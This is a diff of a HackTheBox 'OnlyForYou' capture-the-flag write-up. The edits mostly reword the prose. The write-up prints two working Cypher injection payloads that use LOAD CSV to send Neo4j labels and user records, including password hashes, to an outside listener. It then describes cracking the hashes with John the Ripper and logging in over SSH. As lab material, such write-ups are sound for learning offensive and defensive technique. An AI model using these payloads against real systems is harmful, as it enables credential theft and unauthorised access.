F41zK4r1m/HackTheBox/OnlyForYou.md

 ![image](https://user-images.githubusercontent.com/87700008/234725974-e73af889-e367-4c78-a0fe-b768e9dd6f91.png)
 ![image](https://user-images.githubusercontent.com/87700008/234726008-fde79e2c-ec03-44d3-8322-32b299277c8e.png)

-Getting the label info to list all existing labels.
+I obtained the label info to list all existing labels by using the following payload:
 ```
 ' OR 1=1 WITH 1 as a CALL db.labels() yield label LOAD CSV FROM 'http://IP:80/?label='+label as l RETURN 0 as _0 //
 ```

 ![image](https://user-images.githubusercontent.com/87700008/234726758-9e2d0adb-a45d-4b2c-a8ef-92b04e2c2f1e.png)

-Found 2 tables **user** & **employee**.

-Now Finally it's time to retriee info from the tables :
+I then discovered two tables, namely, '**user**' and '**employee**'.
+It was now time to retrieve information from these tables.
+I used the following payload for this:
 ```
 ' OR 1=1 WITH 1 as a MATCH (f:user) UNWIND keys(f) as p LOAD CSV FROM 'http://10.0.2.4:8000/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //
 ```
 ![image](https://user-images.githubusercontent.com/87700008/234727096-5cee1c9c-bf30-4924-8dc0-03ae315c7441.png)

-In the response I got the admin & john, password hash.
-Now, let's cracl the password of John.

-In few seconds I cracked the password using John the Ripper.
+In the response, I received the admin and John's password hash.
+Next, I used John the Ripper to crack John's password.
+It took me only a few seconds to do this, and I was able to log in to John's account via SSH using the cracked password.

 ![image](https://user-images.githubusercontent.com/87700008/234728055-1ed4f9b5-be08-4e70-a03a-87d7b8092c94.png)

-And, finally I logged in into the John account via SSH using the cracked password & got the user flag. (pwn3d!🙂)
+And, finally I retrieved the user flag. (pwn3d!🙂)

 ![image](https://user-images.githubusercontent.com/87700008/234728218-8d3baefb-294d-494b-a994-22d27a46c887.png)